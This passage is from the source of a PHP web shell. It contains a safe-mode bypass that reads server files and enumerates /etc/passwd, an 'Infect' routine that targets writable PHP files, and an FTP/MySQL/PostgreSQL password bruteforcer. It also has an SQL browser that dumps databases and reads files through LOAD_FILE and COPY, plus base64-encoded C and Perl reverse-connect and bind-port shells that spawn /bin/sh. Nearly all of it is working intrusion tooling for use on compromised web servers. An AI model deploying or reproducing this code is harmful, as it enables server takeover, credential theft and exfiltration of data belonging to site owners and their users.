		echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";
		echo "</select></label><input type=\'submit\' value=\'submit\'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\']))."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>";
	if(!empty($_POST[\'p1\'])) {
		if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));
	}
	echo"</pre></div><br><h1>Search files:</h1><div class=content>
		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>
			<tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>
			<tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\' style=\'width:100%\'></td></tr>
			<tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>
			<tr><td></td><td><input type=\'submit\' value=\'submit\'></td></tr>
			</table></form>";
	function hardRecursiveGlob($path) {
		if(substr($path, -1) != \'/\')
			$path.=\'/\';
		$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));
		if(is_array($paths)&&@count($paths)) {
			foreach($paths as $) {
				if(@is_dir($)){
					if($path!=$)
						hardRecursiveGlob($);
				} else {
					if(empty($_POST[\'p2\']) || @strpos(file_get_contents($), $_POST[\'p2\'])!==false)
						echo "<a href=\'#\' onclick=\'g(\"FilesTools\",null,\"".urlencode($)."\", \"view\",\"\")\'>".htmlspecialchars($)."</a><br>";
				}
			}
		}
	}
	if(@$_POST[\'p3\'])
		hardRecursiveGlob($_POST[\'c\']);
	echo "</div><br><h1>Search for hash:</h1><div class=content>
		<form method=\'post\' target=\'_blank\' name=\'hf\'>
			<input type=\'text\' name=\'hash\' style=\'width:330px;\'><br>
            <input type=\'hidden\' name=\'act\' value=\'find\'/><br>
			<input type=\'submit\' value=\'md5.rednoize.com\' onclick=\"document.hf.action=\'http://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\">
			<input style=\'margin-left: 20px;\' type=\'submit\' value=\'md5decrypter.com\' onclick=\"document.hf.action=\'https://www.md5decrypter.com/\';document.hf.submit()\"><br>
		</form></div>";
	hardFooter();
}
function actionSafeMode() {
	$temp=\'\';
	ob_start();
	switch($_POST[\'p1\']) {
		case 1:
			$temp=@tempnam($test, \'cx\');
			if(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){
				echo @file_get_contents($temp);
				unlink($temp);
			} else
				echo \'Sorry... Can\'t open file\';
			break;
		case 2:
			$files = glob($_POST[\'p2\'].\'*\');
			if( is_array($files) )
				foreach ($files as $filename)
					echo $filename."
";
			break;
		case 3:
			$ch = curl_init("file://".$_POST[\'p2\']."".SELF_PATH);
			curl_exec($ch);
			break;
		case 4:
			ini_restore("safe_mode");
			ini_restore("open_basedir");
			include($_POST[\'p2\']);
			break;
		case 5:
			for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {
				$uid = @posix_getpwuid($_POST[\'p2\']);
				if ($uid)
					echo join(\':\',$uid)."
";
			}
			break;
		case 6:
			if(!function_exists(\'imap_open\'))break;
			$stream = imap_open($_POST[\'p2\'], "", "");
			if ($stream == FALSE)
				break;
			echo imap_body($stream, 1);
			imap_close($stream);
			break;
	}
	$temp = ob_get_clean();
	hardHeader();
	echo \'<h1>Safe mode bypass</h1><div class=content>\';
	echo \'<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>\';
	if($temp)
		echo \'<pre class="ml1" style="margin-top:5px" id="Output">\'.$temp.\'</pre>\';
	echo \'</div>\';
	hardFooter();
}
function actionLogout() {
    setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);
	die("<div align=\'center\'><div class=\'container\'><div class=\'sky\'><div class=\'text\'>THANK YOU & BYE</div><div class=\'stars\'></div><div class=\'stars1\'></div><div class=\'stars2\'></div><div class=\'shooting-stars\'></div></div></div></div>
<style>html{height:100%}html body{width:100%;height:100%;margin:0;font-family:Nunito, sans-serif;}.container{display:block;position:relative;width:100%;height:100%;background:linear-gradient(to bottom,#020107 0,#201b46 100%)}.container .text{color:#fff;position:absolute;top:50%;right:50%;margin:-10px -75px 0 0;font-size:20px;font-family:Nunito, sans-serif;font-weight:700}.shooting-stars{z-index:10;width:5px;height:85px;border-top-left-radius:50%;border-top-right-radius:50%;position:absolute;bottom:0;right:0;background:linear-gradient(to top,rgba(255,255,255,0),#fff);animation:animShootingStar 10s linear infinite}@keyframes animStar{from{transform:translateY(0)}to{transform:translateY(-2560px) translateX(-2560px)}}@keyframes animShootingStar{from{transform:translateY(0) translateX(0) rotate(-45deg);opacity:1;height:5px}to{transform:translateY(-2560px) translateX(-2560px) rotate(-45deg);opacity:1;height:800px}}</style>
<footer id=\'det\' style=\'position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #ff007e; border-bottom: 1px solid #ff007e\'><font face=\'Century Gothic\' color=\'#ff0048\' size=\'5\'><font style=\'font-size: 10pt\' face=\'Century Gothic\'><font face=\'Tahoma\' color=\'#005aff\' size=\'2.5\'><font color=\'#ff007e\'><b> opyight : </b></font>
<marquee scrollamount=\'3\' scrolldelay=\'60\' width=\'80%\'><b>Twepl & <a href=\'https://github.com/mIcHyAmRaNe\'>mIcHy</a> </b></marquee>  </font></font></font></footer>");
}
function actionSelfRemove() {
	if($_POST[\'p1\'] == \'yes\')
		if(@unlink(preg_replace(\'!\(\d+\)\s.*!\', \'\', __FILE__)))
			die(\'Shell has been removed\');
		else
			echo \'unlink error!\';
    if($_POST[\'p1\'] != \'yes\')
        hardHeader();
	echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>\';
	hardFooter();
}
function actionInfect() {
	hardHeader();
	echo \'<h1>Infect</h1><div class=content>\';
	if($_POST[\'p1\'] == \'infect\') {
		$target=$_SERVER[\'DOCUMENT_ROOT\'];
			function ListFiles($dir) {
				if($dh = opendir($dir)) {
					$files = Array();
					$inner_files = Array();
					while($file = readdir($dh)) {
						if($file != "." && $file != "..") {
							if(is_dir($dir . "/" . $file)) {
								$inner_files = ListFiles($dir . "/" . $file);
								if(is_array($inner_files)) $files = array_merge($files, $inner_files);
							} else {
								array_push($files, $dir . "/" . $file);
							}
						}
					}
					closedir($dh);
					return $files;
				}
			}
			foreach (ListFiles($target) as $key=>$file){
				$nFile = substr($file, -4, 4);
				if($nFile == ".php" ){
					if(($file<>$_SERVER[\'DOCUMENT_ROOT\'].$_SERVER[\'PHP_SELF\'])&&(is_writeable($file))){
						echo "$file<br>";
						$i++;
					}
				}
			}
			echo "<font color=#a10705 size=14>$i</font>";
		}else{
			echo "<form method=post><input type=submit value=Infect name=infet></form>";
			echo \'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>\';
		}
	hardFooter();
}
function actionBruteforce() {
	hardHeader();
	if( isset($_POST[\'proto\']) ) {
		echo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\';
		if( $_POST[\'proto\'] == \'ftp\' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$fp = @ftp_connect($ip, $port?$port:21);
				if(!$fp) return false;
				$res = @ftp_login($fp, $login, $pass);
				@ftp_close($fp);
				return $res;
			}
		} elseif( $_POST[\'proto\'] == \'mysql\' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);
				@mysql_close($res);
				return $res;
			}
		} elseif( $_POST[\'proto\'] == \'pgsql\' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";
				$res = @pg_connect($str);
				@pg_close($res);
				return $res;
			}
		}
		$success = 0;
		$attempts = 0;
		$server = explode(":", $_POST[\'server\']);
		if($_POST[\'type\'] == 1) {
			$temp = @file(\'/etc/passwd\');
			if( is_array($temp) )
				foreach($temp as $line) {
					$line = explode(":", $line);
					++$attempts;
					if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
						$success++;
						echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\';
					}
					if(@$_POST[\'reverse\']) {
						$tmp = "";
						for($i=strlen($line[0])-1; $i>=0; --$i)
							$tmp .= $line[0][$i];
						++$attempts;
						if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
							$success++;
							echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp);
						}
					}
				}
		} elseif($_POST[\'type\'] == 2) {
			$temp = @file($_POST[\'dict\']);
			if( is_array($temp) )
				foreach($temp as $line) {
					$line = trim($line);
					++$attempts;
					if( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {
						$success++;
						echo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\';
					}
				}
		}
		echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
	}
	echo \'<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\'
		.\'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>\'
		.\'<input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\'
		.\'<input type=hidden name=a value="\'.htmlspecialchars($_POST[\'a\']).\'">\'
		.\'<input type=hidden name=charset value="\'.htmlspecialchars($_POST[\'charset\']).\'">\'
		.\'<input type=hidden name=ne  value="">\'
		.\'<span>Server:port</span></td>\'
		.\'<td><input type=text name=server value="127.0.0.1"></td></tr>\'
		.\'<tr><td><span>Brute type</span></td>\'
		.\'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>\'
		.\'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>\'
		.\'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>\'
		.\'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>\'
		.\'<td><input type=text name=login value="root"></td></tr>\'
		.\'<tr><td><span>Dictionary</span></td>\'
		.\'<td><input type=text name=dict value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic"></td></tr></table>\'
		.\'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>\';
	echo \'</div>\';
	hardFooter();
}
function actionSql() {
	class DbClass {
		var $type;
		var $link;
		var $res;
		function __construct($type)	{
			$this->type = $type;
		}
		function connect($host, $user, $pass, $dbname){
			switch($this->type)	{
				case \'mysql\':
					if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
					break;
				case \'pgsql\':
					$host = explode(\':\', $host);
					if(!$host[1]) $host[1]=5432;
					if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
					break;
			}
			return false;
		}
		function selectdb($db) {
			switch($this->type)	{
				case \'mysql\':
					if (@mysql_select_db($db))return true;
					break;
			}
			return false;
		}
		function query($str) {
			switch($this->type) {
				case \'mysql\':
					return $this->res = @mysql_query($str);
					break;
				case \'pgsql\':
					return $this->res = @pg_query($this->link,$str);
					break;
			}
			return false;
		}
		function fetch() {
			$res = func_num_args()?func_get_arg(0):$this->res;
			switch($this->type)	{
				case \'mysql\':
					return @mysql_fetch_assoc($res);
					break;
				case \'pgsql\':
					return @pg_fetch_assoc($res);
					break;
			}
			return false;
		}
		function listDbs() {
			switch($this->type)	{
				case \'mysql\':
                        return $this->query("SHOW databases");
				break;
				case \'pgsql\':
					return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");
				break;
			}
			return false;
		}
		function listTables() {
			switch($this->type)	{
				case \'mysql\':
					return $this->res = $this->query(\'SHOW TABLES\');
				break;
				case \'pgsql\':
					return $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");
				break;
			}
			return false;
		}
		function error() {
			switch($this->type)	{
				case \'mysql\':
					return @mysql_error();
				break;
				case \'pgsql\':
					return @pg_last_error();
				break;
			}
			return false;
		}
		function setCharset($str) {
			switch($this->type)	{
				case \'mysql\':
					if(function_exists(\'mysql_set_charset\'))
						return @mysql_set_charset($str, $this->link);
					else
						$this->query(\'SET CHARSET \'.$str);
					break;
				case \'pgsql\':
					return @pg_set_client_encoding($this->link, $str);
					break;
			}
			return false;
		}
		function loadFile($str) {
			switch($this->type)	{
				case \'mysql\':
					return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));
				break;
				case \'pgsql\':
					$this->query("CREATE TABLE hard2(file text);COPY hard2 FROM \'".addslashes($str)."\';select file from hard2;");
					$r=array();
					while($i=$this->fetch())
						$r[] = $i[\'file\'];
					$this->query(\'drop table hard2\');
					return array(\'file\'=>implode("
",$r));
				break;
			}
			return false;
		}
		function dump($table, $fp = false) {
			switch($this->type)	{
				case \'mysql\':
					$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');
					$create = mysql_fetch_array($res);
					$sql = $create[1].";
";
                    if($fp) fwrite($fp, $sql); else echo($sql);
					$this->query(\'SELECT * FROM `\'.$table.\'`\');
                    $i = 0;
                    $head = true;
					while($ = $this->fetch()) {
                        $sql = \'\';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";

";
                        }
						$columns = array();
						foreach($ as $k=>$v) {
                            if($v === null)
                                $[$k] = "NULL";
                            elseif(is_int($v))
                                $[$k] = $v;
                            else
                                $[$k] = "\'".@mysql_real_escape_string($v)."\'";
							$columns[] = "`".$k."`";
						}
                        if($head) {
                            $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES 
	(".implode(", ", $).\')\';
                            $head = false;
                        } else
                            $sql .= "
	,(".implode(", ", $).\')\';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
					}
                    if(!$head)
                        if($fp) fwrite($fp, ";

"); else echo(";

");
				break;
				case \'pgsql\':
					$this->query(\'SELECT * FROM \'.$table);
					while($ = $this->fetch()) {
						$columns = array();
						foreach($ as $k=>$v) {
							$[$k] = "\'".addslashes($v)."\'";
							$columns[] = $k;
						}
                        $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $).\');\'."
";
                        if($fp) fwrite($fp, $sql); else echo($sql);
					}
				break;
			}
			return false;
		}
	};
	$db = new DbClass($_POST[\'type\']);
	if((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {
		$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);
		$db->selectdb($_POST[\'sql_base\']);
        switch($_POST[\'charset\']) {
            case "Windows-1251": $db->setCharset(\'cp1251\'); break;
            case "UTF-8": $db->setCharset(\'utf8\'); break;
            case "KOI8-R": $db->setCharset(\'koi8r\'); break;
            case "KOI8-U": $db->setCharset(\'koi8u\'); break;
            case "cp866": $db->setCharset(\'cp866\'); break;
        }
        if(empty($_POST[\'file\'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST[\'tbl\'] as $v)
				$db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {
            foreach($_POST[\'tbl\'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST[\'p2\']);
        } else
            die(\'<script>alert("Error! Can\'t open file");window.history.back(-1)</script>\');
	}
	hardHeader();
	echo "
<h1>Sql browser</h1><div class=content>
<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=\'\'><input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>
<td><label><select name=\'type\'><option value=\'mysql\' ";
    if(@$_POST[\'type\']==\'mysql\')echo \'selected\';
echo ">MySql</option><option value=\'pgsql\' ";
if(@$_POST[\'type\']==\'pgsql\')echo \'selected\';
echo ">PostgreSql</option></select></label></td>
<td><input type=text name=sql_host value=\"". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\" required></td><td>";
	$tmp = "<input type=text name=sql_base value=\'\'>";
	if(isset($_POST[\'sql_host\'])){
		if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {
			switch($_POST[\'charset\']) {
				case "Windows-1251": $db->setCharset(\'cp1251\'); break;
				case "UTF-8": $db->setCharset(\'utf8\'); break;
				case "KOI8-R": $db->setCharset(\'koi8r\'); break;
				case "KOI8-U": $db->setCharset(\'koi8u\'); break;
				case "cp866": $db->setCharset(\'cp866\'); break;
			}
			$db->listDbs();
			echo "<label><select name=sql_base><option value=\'\'></option>";
			while($ = $db->fetch()) {
				list($key, $value) = each($);
				echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';
			}
			echo \'</select></label>\';
		}
		else echo $tmp;
	}else
		echo $tmp;
	echo "</td>
				<td><input type=submit value=\'submit\' onclick=\'fs(d.sf);\'></td>
                <td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>
			</tr>
		</table>
		<script>
            s_db=\'".@addslashes($_POST[\'sql_base\'])."\';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value=\'\';
                    if(f.p2) f.p2.value=\'\';
                    if(f.p3) f.p3.value=\'\';
                }
            }
			function st(t,l) {
				d.sf.p1.value = \'select\';
				d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
				d.sf.submit();
			}
			function is() {
				for(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)
					d.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;
			}
		</script>";
	if(isset($db) && $db->link){
		echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
			if(!empty($_POST[\'sql_base\'])){
				$db->selectdb($_POST[\'sql_base\']);
				echo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>";
				$tbls_res = $db->listTables();
				while($ = $db->fetch($tbls_res)) {
					list($key, $value) = each($);
                    if(!empty($_POST[\'sql_count\']))
                        $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));
					$value = htmlspecialchars($value);
					echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;<a href=# onclick=\"st(\'".$value."\',1)\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\'&nbsp;\':" <small>({$n[\'n\']})</small>") . "</nobr><br>";
				}
				echo "<input type=\'checkbox\' onclick=\'is();\'> <input type=submit value=\'Dump\' onclick=\'document.sf.p2.value=\"download\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>";
				if(@$_POST[\'p1\'] == \'select\') {
					$_POST[\'p1\'] = \'query\';
                    $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;
					$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);
					$num = $db->fetch();
					$pages = ceil($num[\'n\'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST[\'p2\'] . "\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">";
                    echo " of $pages";
                    if($_POST[\'p3\'] > 1)
                        echo " <a href=# onclick=\'st(\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>&lt; Prev</a>";
                    if($_POST[\'p3\'] < $pages)
                        echo " <a href=# onclick=\'st(\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . ")\'>Next &gt;</a>";
                    $_POST[\'p3\']--;
					if($_POST[\'type\']==\'pgsql\')
						$_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);
					else
						$_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';
					echo "<br><br>";
				}
				if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {
					$db->query(@$_POST[\'p2\']);
					if($db->res !== false) {
						$title = false;
						echo \'<table width=100% cellspacing=1 cellpadding=2 class=main>\';
						$line = 1;
						while($ = $db->fetch())	{
							if(!$title)	{
								echo \'<tr>\';
								foreach($ as $key => $value)
									echo \'<th>\'.$key.\'</th>\';
								reset($);
								$title=true;
								echo \'</tr><tr>\';
								$line = 2;
							}
							echo \'<tr class="l\'.$line.\'">\';
							$line = $line==1?2:1;
							foreach($ as $key => $value) {
								if($value == null)
									echo \'<td><i>null</i></td>\';
								else
									echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';
							}
							echo \'</tr>\';
						}
						echo \'</table>\';
					} else {
						echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';
					}
				}
				echo "<br></form><form onsubmit=\'d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>";
                if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))
                    echo htmlspecialchars($_POST[\'p2\']);
                echo "</textarea><br/><input type=submit value=\'Execute\'>";
				echo "</td></tr>";
			}
			echo "</table></form><br/>";
            if($_POST[\'type\']==\'mysql\') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");
                if($db->fetch())
                    echo "<form onsubmit=\'d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input  class=\'toolsInp\' type=text name=f><input type=submit value=\'submit\'></form>";
            }
			if(@$_POST[\'p1\'] == \'loadfile\') {
				$file = $db->loadFile($_POST[\'p2\']);
				echo \'<br/><pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';
			}
	} else {
        echo htmlspecialchars($db->error());
    }
	echo \'</div>\';
	hardFooter();
}
function actionNetwork() {
	hardHeader();
	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
	$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
